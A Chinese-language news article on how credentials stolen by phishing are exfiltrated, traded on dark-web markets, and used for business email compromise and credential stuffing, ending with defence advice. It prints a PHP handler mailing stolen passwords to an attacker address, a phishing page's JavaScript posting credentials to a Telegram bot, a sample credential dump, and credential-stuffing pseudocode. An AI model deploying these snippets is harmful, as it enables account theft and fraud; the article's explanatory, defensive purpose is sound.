news 2026/2/10 12:24:17

钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪

凌晨三点,深圳某科技公司运维工程师张磊被手机震动惊醒。他点开一封来自“Microsoft Security Alert”的邮件,显示其Azure账户在莫斯科有异常登录。他立刻登录查看——果然,后台多了几个陌生的API密钥,部分虚拟机已被删除。更糟的是,公司财务共享邮箱的转发规则被悄悄修改,过去两周所有含“发票”“付款”字眼的邮件,都被自动抄送至一个Gmail地址。

这不是电影情节,而是2025年第四季度国内多起企业遭钓鱼攻击后的典型后果。而这一切的起点,可能只是员工点击了一封伪装成“DHL包裹通知”的链接。

近日,一项由多家安全研究机构联合开展的新调查,首次系统性追踪了钓鱼攻击中被盗数据的完整生命周期。研究发现,从用户在伪造页面输入账号密码的那一刻起,这些信息往往在90秒内就被传送到攻击者控制的通信通道,并迅速进入一个高度分工、自动化运作的地下犯罪生态。这场“数据黑市之旅”,不仅揭示了网络钓鱼早已不是“单打独斗”的小偷小摸,而是一条具备工业化流水线特征的跨国灰色产业链。

一、从PHP脚本到Telegram机器人:钓鱼数据的“第一公里”传输革命

传统认知中,钓鱼网站通过嵌入一段简单的PHP脚本,将表单数据以邮件形式发送给攻击者。例如:

<?php

$login = $_POST['username'];

$pass = $_POST['password'];

mail('attacker@protonmail.com', 'New Credential', "User: $login\nPass: $pass");

header("Location: https://real-bank.com/login");

?>

但这种模式正迅速被淘汰。原因很简单:主流邮件服务商(如Gmail、Outlook)对异常发信行为的检测日益严格,大量钓鱼邮件被直接拦截或标记为垃圾。更致命的是,一旦服务器IP因发送垃圾邮件被拉黑,整个钓鱼页面就失效了。

取而代之的,是基于即时通讯工具的实时数据回传机制。其中,Telegram因其开放的Bot API、端到端加密(可选)、以及极低的运营门槛,成为当前最主流的“数据接收器”。

研究人员在2025年12月捕获的一个仿冒招商银行的钓鱼页面中,发现了如下代码片段:

// 钓鱼表单提交后执行

fetch('https://api.telegram.org/bot<TOKEN>/sendMessage', {

method: 'POST',

headers: { 'Content-Type': 'application/json' },

body: JSON.stringify({

chat_id: '<CHAT_ID>',

text: `🏦 新凭证!\n用户名: ${username}\n密码: ${password}\nIP: ${userIP}\nUA: ${navigator.userAgent}`

})

}).then(() => window.location.href = 'https://cmbchina.com');

这段代码的关键在于<TOKEN>和<CHAT_ID>——它们指向攻击者预先创建的Telegram Bot。一旦用户提交信息,数据几乎瞬时出现在攻击者的私聊窗口中,且无需暴露任何邮箱地址。更重要的是,Telegram Bot可被多个钓鱼页面复用,形成“一对多”的数据汇聚中心。

“这相当于把过去的‘邮政投递’升级成了‘快递闪送’,”公共互联网反网络钓鱼工作组技术专家芦笛解释道,“攻击者现在能实时看到‘猎物上钩’,甚至可以根据地理位置决定是否立即行动——比如,如果受害者IP显示在北京金融街,他们可能会优先处理。”

更令人警惕的是,部分高级钓鱼套件已实现双通道冗余传输:同时向Telegram Bot和备用邮箱发送数据,确保即使一条通道失效,另一条仍能保底。这种设计极大提升了攻击成功率。

二、从“原始dump”到“数字画像”:暗网上的数据炼金术

数据抵达攻击者手中,只是旅程的开始。根据Kaspersky Digital Footprint Intelligence的监测,2025年全球钓鱼攻击中,88.5%的目标是账户凭证,其次是个人身份信息(9.5%)和银行卡数据(2%)。但这些原始数据本身价值有限——真正值钱的,是经过“提纯”和“融合”后的高价值情报包。

研究团队追踪了一个名为“ShadowVault”的俄语暗网论坛交易记录。一名卖家以50美元的价格出售一份包含320万条钓鱼获取的原始凭证数据包,格式如下:

email: zhang.wei@company.com

password: ZW2023!@#

source: fake_dhl_phish_20251201

ip: 221.234.xx.xx

timestamp: 2025-12-01 14:23:11

这类“raw dump”通常由初级钓鱼团伙批量出售,买家多为下游的“数据分析师”。他们的工作,是验证这些凭证的有效性,并与其他泄露数据库(如2023年某社交平台2亿用户泄露事件)进行交叉比对。

例如,若发现zhang.wei@company.com在多个平台使用相同密码,且该邮箱关联了LinkedIn、GitHub甚至企业微信,则可构建出一份完整的“数字画像”:

姓名:张伟

职位:某科技公司IT运维

技术栈:熟悉Azure、Linux、Docker

社交关系:常与财务部李经理邮件往来

使用习惯:工作日上午9点登录邮箱,偏好Chrome浏览器

这样的画像,在暗网售价可达200–500美元,远高于原始凭证。而如果该账户拥有企业管理员权限,价格可能飙升至数千美元。

“钓鱼不再是‘广撒网碰运气’,而是精准制导的‘情报战’,”芦笛指出,“攻击者现在会专门针对特定行业(如金融、物流、制造)定制钓鱼页面,目的就是获取能串联起组织架构的关键节点账户。”

三、企业邮箱劫持:从“静默监控”到“商业邮件欺诈”

对于普通用户,被盗密码可能导致社交媒体被发广告、网银余额清零。但对于企业,钓鱼攻击的后果更为隐蔽且致命——商业邮件欺诈(BEC, Business Email Compromise)。

研究显示,攻击者在成功获取企业邮箱(尤其是高管或财务人员)后,不会立即行动。相反,他们会开启长达数周的“潜伏期”:

设置邮件转发规则:将含关键词(如“invoice”、“payment”、“contract”)的邮件自动转发至外部邮箱;

分析沟通模式:观察内部审批流程、常用话术、签名格式;

等待时机:直到一笔真实付款即将发生时,伪造一封“收款账户变更通知”。

2025年10月,浙江一家外贸公司就因此损失180万美元。攻击者通过钓鱼获取CFO助理邮箱后,监控到一笔对德国供应商的付款计划,随即以CFO名义发送邮件:“因外汇管制,本次付款请改至以下新账户……” 财务人员未察觉异常,完成转账。

更危险的是,部分攻击者会利用被盗SaaS账户(如Office 365、Google Workspace)申请新的API令牌,绕过多因素认证(MFA),实现持久化访问。即使原密码被重置,攻击者仍可通过合法API接口操作数据。

“很多企业以为开了MFA就万事大吉,但钓鱼可以绕过它,”芦笛强调,“比如通过伪造的MFA确认页面诱导用户点击‘Approve’,或者利用OAuth授权钓鱼——让用户授权一个恶意应用,从而获得长期访问权。”

四、撞库自动化:一个密码撬动十个平台

钓鱼获取的密码,还常被用于撞库攻击(Credential Stuffing)。由于大量用户在不同平台重复使用相同密码,攻击者只需将钓鱼所得的“用户名+密码”组合,批量尝试登录其他网站。

现代撞库工具已高度智能化。以开源工具OpenBullet2为例,攻击者可加载数千个目标网站的登录接口配置(称为“Configs”),并设置代理轮换、请求头伪装、验证码识别模块,实现全自动撞库。

一段典型的撞库配置逻辑如下(伪代码):

for credential in stolen_credentials:

for target_site in target_sites:

session = create_session(proxy=rotate_proxy())

response = session.post(

url=target_site.login_url,

data={

'email': credential.email,

'password': credential.password

},

headers=fake_headers()

)

if "dashboard" in response.url or "welcome" in response.text:

log_success(credential, target_site)

sell_to_darkweb(credential, target_site)

2025年,国内某大型电商平台就遭遇大规模撞库,源头正是此前一起钓鱼事件泄露的百万级凭证库。攻击者不仅盗取了用户积分,还利用实名信息尝试注册网贷账户。

“撞库的成功率其实不高,可能只有0.1%–1%,”芦笛说,“但当你有100万条数据时,1%就是1万个有效账户——足够支撑一个黑产团伙运转半年。”

五、国际镜鉴:从美国医疗钓鱼案看国内防御短板

钓鱼攻击无国界。2025年7月,美国卫生与公共服务部(HHS)披露,一起针对医疗系统的钓鱼攻击导致超1000万人健康数据泄露。攻击者伪装成医保审核员,诱骗医院员工点击“合规检查”链接,最终渗透至电子病历系统。

此案的关键教训在于:钓鱼不仅是IT问题,更是业务流程风险。攻击者利用了医疗机构对“合规审查”的天然信任心理。

类似手法在国内同样频发。2025年11月,某省税务局“税务稽查通知”钓鱼邮件泛滥,页面高度仿冒官方系统,要求企业法人“在线确认申报信息”。多家中小企业中招,导致UKey证书被窃、增值税发票被虚开。

“我们总在技术层面打补丁,却忽视了社会工程学的本质——利用人性弱点,”芦笛坦言,“反钓鱼不能只靠防火墙和杀毒软件,必须嵌入到员工培训、审批流程、甚至企业文化中。”

六、防御之道:从“被动响应”到“主动免疫”

面对如此复杂的钓鱼生态,个人与企业该如何应对?

对个人用户,专家建议:

绝不复用密码:使用密码管理器生成并存储唯一强密码;

强制启用MFA:优先选择FIDO2安全密钥(如YubiKey)或认证器App,避免短信验证码;

定期检查泄露记录:通过Have I Been Pwned等平台查询邮箱是否出现在已知泄露库中。

对企业组织,则需构建纵深防御体系:

统一身份治理:集中管理所有SaaS账户,实施最小权限原则;

异常登录监测:基于IP、设备指纹、行为序列建立基线,实时告警偏离行为;

钓鱼演练常态化:定期向员工发送模拟钓鱼邮件,测试并提升安全意识;

凭证泄露响应机制:一旦确认某账户凭证泄露,立即强制全平台密码重置,并审计其历史操作日志。

芦笛特别强调:“最好的防御,是让攻击者觉得‘不值得’。如果你的员工知道如何识别钓鱼,你的系统能快速隔离异常会话,你的财务流程有多人复核——那么即使密码泄露,损失也能控制在最小范围。”

结语:没有“完美安全”,只有持续对抗

从DHL仿冒页面到Telegram Bot,从暗网数据集市到企业内网渗透,钓鱼攻击的链条越来越长,技术越来越精。它不再是一次性的“诈骗”,而是一场围绕数据价值展开的持久战。

正如一位安全研究员所言:“在今天的网络世界,你的密码不是锁,而是一张门票——而这张门票,可能已经被复制了上千份。”

面对这场看不见硝烟的战争,技术手段固然重要,但真正的防线,始终在人的意识之中。毕竟,再先进的AI钓鱼工具,也骗不过一个始终保持警惕的大脑。

编辑:芦笛(公共互联网反网络钓鱼工作组)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/6 5:03:28

智能字体优化方案:5步打造跨平台完美视觉体验

智能字体优化方案&#xff1a;5步打造跨平台完美视觉体验 【免费下载链接】PingFangSC PingFangSC字体包文件、苹果平方字体文件&#xff0c;包含ttf和woff2格式 项目地址: https://gitcode.com/gh_mirrors/pi/PingFangSC 还在为网站字体显示效果参差不齐而困扰吗&#…

作者头像 李华
网站建设 2026/2/8 19:05:26

Qwen3-VL视觉代理开发:网页自动化测试全流程

Qwen3-VL视觉代理开发&#xff1a;网页自动化测试全流程 1. 引言&#xff1a;为何需要视觉代理进行网页自动化测试 随着Web应用复杂度的不断提升&#xff0c;传统的基于DOM解析和脚本驱动的自动化测试方案&#xff08;如Selenium、Puppeteer&#xff09;在面对动态渲染、无明…

作者头像 李华
网站建设 2026/1/29 11:47:32

Wan2.2-Animate:零门槛AI动画制作神器,让每个人都能成为动画师

Wan2.2-Animate&#xff1a;零门槛AI动画制作神器&#xff0c;让每个人都能成为动画师 【免费下载链接】Wan2.2-Animate-14B 项目地址: https://ai.gitcode.com/hf_mirrors/Wan-AI/Wan2.2-Animate-14B 还在为复杂的动画制作流程而烦恼吗&#xff1f;Wan2.2-Animate-14B…

作者头像 李华
网站建设 2026/2/8 10:24:15

PingFangSC字体:如何选择最适合你的跨平台免费字体解决方案

PingFangSC字体&#xff1a;如何选择最适合你的跨平台免费字体解决方案 【免费下载链接】PingFangSC PingFangSC字体包文件、苹果平方字体文件&#xff0c;包含ttf和woff2格式 项目地址: https://gitcode.com/gh_mirrors/pi/PingFangSC 你是否曾经因为网页在不同设备上字…

作者头像 李华
网站建设 2026/2/8 2:14:47

Virtual Display Driver虚拟显示器驱动实战秘籍

Virtual Display Driver虚拟显示器驱动实战秘籍 【免费下载链接】Virtual-Display-Driver Add virtual monitors to your windows 10/11 device! Works with VR, OBS, Sunshine, and/or any desktop sharing software. 项目地址: https://gitcode.com/gh_mirrors/vi/Virtual-…

作者头像 李华
网站建设 2026/2/7 5:26:32

Qwen3-VL-WEBUI实战教程:从零部署到视觉语言模型应用

Qwen3-VL-WEBUI实战教程&#xff1a;从零部署到视觉语言模型应用 1. 教程目标与前置准备 1.1 学习目标 本教程将带你从零开始完整部署并使用 Qwen3-VL-WEBUI&#xff0c;掌握基于阿里开源的视觉语言大模型&#xff08;VLM&#xff09;Qwen3-VL-4B-Instruct 的本地化推理环境…

作者头像 李华